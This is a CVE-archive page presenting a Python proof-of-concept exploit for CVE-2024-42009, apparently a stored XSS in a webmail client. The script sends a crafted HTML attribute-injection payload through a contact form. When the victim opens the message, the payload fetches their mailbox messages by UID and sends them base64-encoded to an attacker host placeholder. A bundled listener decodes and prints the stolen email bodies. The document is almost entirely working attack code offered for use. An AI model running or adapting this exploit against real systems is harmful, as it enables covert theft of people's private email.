4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-42009
README.md
Rendering markdown...
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
import threading
import time
import requests
import base64
from bs4 import BeautifulSoup
from http.server import BaseHTTPRequestHandler, HTTPServer

# --- HTTP Listener ---
class RequestHandler(BaseHTTPRequestHandler):
    def Capture_Emails(self):
        if '?c=' in self.path:
            b64_data = self.path.split('?c=')[1]
            decoded = base64.b64decode(b64_data).decode('utf-8', 'ignore')
            soup = BeautifulSoup(decoded, 'html.parser')
            messagebody_div = soup.find('div', id='messagebody')
            if messagebody_div:
                print("\n[+] Captured Email Content:")
                print(messagebody_div.decode_contents())
            else:
                print("\n[-] No messagebody div found")

def listener(port=1337):
    server_address = ('', port)
    httpd = HTTPServer(server_address, RequestHandler)
    print(f"[*] Listening on port {port}...\n")
    httpd.serve_forever()

# --- Start Listener ---
listener_thread = threading.Thread(target=listener, daemon=True)
listener_thread.start()
time.sleep(1)

# --- Attack Configuration ---
TARGET_URL = "http://victim.com/contact"
START_UID = 1
END_UID = 4  

# --- Critical Fixes ---
for uid in range(START_UID, END_UID + 1):
    # 1. Revert to original attribute injection (no quotes around style/event)
    malicious_payload = (
        f'<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes '  # Intentional missing quote
        f'onanimationstart=fetch(\'/?_task=mail&_action=show&_uid={uid}&_mbox=INBOX&_extwin=1\')'  # Use & instead of &amp;
        '.then(r=>r.text()).then(t=>fetch(`http://YOUR_IP:4444/?c=${btoa(t)}`)) foo=bar>'  # Ensure backticks
    )

    post_data = {
        "name": "XSS Bot",
        "email": "[email protected]",
        "message": malicious_payload,
        "content": "html",
        "recipient": "THE_ONE_U_WILL_SEND_EMAIL_TO"
    }

    try:
        print(f"[*] Sending payload for UID {uid}...")
        response = requests.post(TARGET_URL, data=post_data, timeout=10)
        print(f"[+] UID {uid} sent (Status: {response.status_code})")
    except Exception as e:
        print(f"[!] Error for UID {uid}: {str(e)}")

    time.sleep(2)  # Increase delay to avoid rate limiting

# --- Keep Alive ---
try:
    while True: time.sleep(1)
except KeyboardInterrupt:
    print("\n[!] Stopping...")